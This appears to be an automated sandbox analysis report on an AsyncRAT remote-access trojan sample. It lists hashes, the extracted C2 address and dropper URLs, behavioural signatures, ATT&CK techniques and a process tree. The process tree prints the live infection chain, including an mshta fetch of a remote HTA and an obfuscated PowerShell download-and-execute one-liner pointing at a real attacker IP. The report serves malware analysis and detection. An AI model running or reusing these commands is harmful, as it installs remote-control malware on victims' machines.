asyncrat | 9699022b7bd45a72cf29614bdd131400dbee0ab5d6a5c2e03ed1c13e7cf0eca0

General

Target

file.exe
Size

91KB
MD5

0930b477703d6a03eb120ad3543513d8
SHA1

7bc33a9595ffd5f5bacb6843ee1dfcd86df74fa1
SHA256

9699022b7bd45a72cf29614bdd131400dbee0ab5d6a5c2e03ed1c13e7cf0eca0
SHA512

0d9b4c07fbc13f484269d181f2587c92f7a7b817bca07f9956c16aa01c441d8a60ae13afe554f2f8a497607730d7641b2352f481d3cebb98e633b03ddc27617d
SSDEEP

1536:XRzdezMTHOFP5WKcyRm1YGl/KVzFeS6Bqt/pr2sQOIkbrPsNI:WzMDKwKx8Yl1FKqtRFYsrPV

Score

10^/10

asyncrat $rat upx

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://80.66.88.146/R.html

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://80.66.88.146/R.png

Extracted

Family

asyncrat

Version

1.0.7

Botnet

$

C2

80.66.88.146:8848

Mutex

TEHJRTRYKSRZSDJHT

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/3944-152-0x0000000000400000-0x0000000000416000-memory.dmp	asyncrat

Blocklisted process makes network request 2 IoCs

Processes:

mshta.exepowershell.exe

flow pid process

12 400 mshta.exe
20 3508 powershell.exe

flow	pid	process
12	400	mshta.exe
20	3508	powershell.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/4628-132-0x0000000000400000-0x0000000000434000-memory.dmp	upx
behavioral2/memory/4628-136-0x0000000000400000-0x0000000000434000-memory.dmp	upx

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

file.exeWScript.exemshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	file.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	mshta.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3508 set thread context of 3944 3508 powershell.exe RegSvcs.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

file.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings file.exe

description	pid	process	target process
PID 3508 set thread context of 3944	3508	powershell.exe	RegSvcs.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	file.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exe

pid	process
3508	powershell.exe
3508	powershell.exe
3508	powershell.exe
3508	powershell.exe
3508	powershell.exe
3508	powershell.exe
3508	powershell.exe
3508	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exeRegSvcs.exe

description pid process

Token: SeDebugPrivilege 3508 powershell.exe
Token: SeDebugPrivilege 3944 RegSvcs.exe

description	pid	process
Token: SeDebugPrivilege	3508	powershell.exe
Token: SeDebugPrivilege	3944	RegSvcs.exe

Suspicious use of WriteProcessMemory 29 IoCs

Processes:

file.exeWScript.execmd.exemshta.exepowershell.exe

description	pid	process	target process
PID 4628 wrote to memory of 2680	4628	file.exe	WScript.exe
PID 4628 wrote to memory of 2680	4628	file.exe	WScript.exe
PID 4628 wrote to memory of 2680	4628	file.exe	WScript.exe
PID 2680 wrote to memory of 2448	2680	WScript.exe	cmd.exe
PID 2680 wrote to memory of 2448	2680	WScript.exe	cmd.exe
PID 2680 wrote to memory of 2448	2680	WScript.exe	cmd.exe
PID 2448 wrote to memory of 400	2448	cmd.exe	mshta.exe
PID 2448 wrote to memory of 400	2448	cmd.exe	mshta.exe
PID 2448 wrote to memory of 400	2448	cmd.exe	mshta.exe
PID 400 wrote to memory of 3508	400	mshta.exe	powershell.exe
PID 400 wrote to memory of 3508	400	mshta.exe	powershell.exe
PID 400 wrote to memory of 3508	400	mshta.exe	powershell.exe
PID 3508 wrote to memory of 3504	3508	powershell.exe	RegSvcs.exe
PID 3508 wrote to memory of 3504	3508	powershell.exe	RegSvcs.exe
PID 3508 wrote to memory of 3504	3508	powershell.exe	RegSvcs.exe
PID 3508 wrote to memory of 1568	3508	powershell.exe	RegSvcs.exe
PID 3508 wrote to memory of 1568	3508	powershell.exe	RegSvcs.exe
PID 3508 wrote to memory of 1568	3508	powershell.exe	RegSvcs.exe
PID 3508 wrote to memory of 1608	3508	powershell.exe	RegSvcs.exe
PID 3508 wrote to memory of 1608	3508	powershell.exe	RegSvcs.exe
PID 3508 wrote to memory of 1608	3508	powershell.exe	RegSvcs.exe
PID 3508 wrote to memory of 3944	3508	powershell.exe	RegSvcs.exe
PID 3508 wrote to memory of 3944	3508	powershell.exe	RegSvcs.exe
PID 3508 wrote to memory of 3944	3508	powershell.exe	RegSvcs.exe
PID 3508 wrote to memory of 3944	3508	powershell.exe	RegSvcs.exe
PID 3508 wrote to memory of 3944	3508	powershell.exe	RegSvcs.exe
PID 3508 wrote to memory of 3944	3508	powershell.exe	RegSvcs.exe
PID 3508 wrote to memory of 3944	3508	powershell.exe	RegSvcs.exe
PID 3508 wrote to memory of 3944	3508	powershell.exe	RegSvcs.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4628

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\0x.vbs"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2680

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c mshta http://80.66.88.146/R.html
3⤵
- Suspicious use of WriteProcessMemory
PID:2448

C:\Windows\SysWOW64\mshta.exe
mshta http://80.66.88.146/R.html
4⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:400

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{AWA}(N{AWA}{AWA}e{AWA}w-{AWA}Ob{AWA}{AWA}je{AWA}{AWA}c{AWA}t N{AWA}{AWA}e{AWA}t.W{AWA}e';$c4='b{AWA}{AWA}Cli{AWA}{AWA}en{AWA}{AWA}t{AWA}).Do{AWA}{AWA}wn{AWA}{AWA}l{AWA}o';$c3='a{AWA}dS{AWA}{AWA}t{AWA}ri{AWA}{AWA}n{AWA}g{AWA}(''h{AWA}tt{AWA}p:/{AWA}/80.66.88.146/R.png''){AWA}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{AWA}','');IEX $TC|IEX
5⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3508

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
6⤵
PID:3504

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
6⤵
PID:1568

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
6⤵
PID:1608

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3944

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\0x.vbs
Filesize
1KB

MD5
ae1c49e0588d1d2e09338aef13d408d9

SHA1
20e9198994d5e610c6289ebceea594619732d1e7

SHA256
6d68d66efe4cc8b58b9e9fb1461a8728606d1f27b23f1ecaa165cf8c5a62c4e4

SHA512
ecf714df09c4f3030c72346c9fd5914d1bb661d0ad13e8e409721212529ac0f68b7b0ce0e7f39e350e3c9999d07cd612426e2524e5627d5fdc56757c3beb4f8e

Download Submit
memory/400-137-0x0000000000000000-mapping.dmp

Download
memory/1568-149-0x0000000000000000-mapping.dmp

Download
memory/1608-150-0x0000000000000000-mapping.dmp

Download
memory/2448-135-0x0000000000000000-mapping.dmp

Download
memory/2680-133-0x0000000000000000-mapping.dmp

Download
memory/3504-148-0x0000000000000000-mapping.dmp

Download
memory/3508-142-0x0000000005E80000-0x0000000005EE6000-memory.dmp

Filesize
408KB

Download
memory/3508-146-0x0000000006980000-0x000000000699A000-memory.dmp

Filesize
104KB

Download
memory/3508-141-0x0000000005690000-0x00000000056B2000-memory.dmp

Filesize
136KB

Download
memory/3508-138-0x0000000000000000-mapping.dmp

Download
memory/3508-143-0x0000000005EF0000-0x0000000005F56000-memory.dmp

Filesize
408KB

Download
memory/3508-144-0x0000000006440000-0x000000000645E000-memory.dmp

Filesize
120KB

Download
memory/3508-145-0x0000000007C70000-0x00000000082EA000-memory.dmp

Filesize
6.5MB

Download
memory/3508-140-0x00000000057E0000-0x0000000005E08000-memory.dmp

Filesize
6.2MB

Download
memory/3508-147-0x0000000007950000-0x00000000079EC000-memory.dmp

Filesize
624KB

Download
memory/3508-139-0x0000000002C00000-0x0000000002C36000-memory.dmp

Filesize
216KB

Download
memory/3944-151-0x0000000000000000-mapping.dmp

Download
memory/3944-152-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/3944-153-0x0000000005B40000-0x00000000060E4000-memory.dmp

Filesize
5.6MB

Download
memory/4628-132-0x0000000000400000-0x0000000000434000-memory.dmp

Filesize
208KB

Download
memory/4628-136-0x0000000000400000-0x0000000000434000-memory.dmp

Filesize
208KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads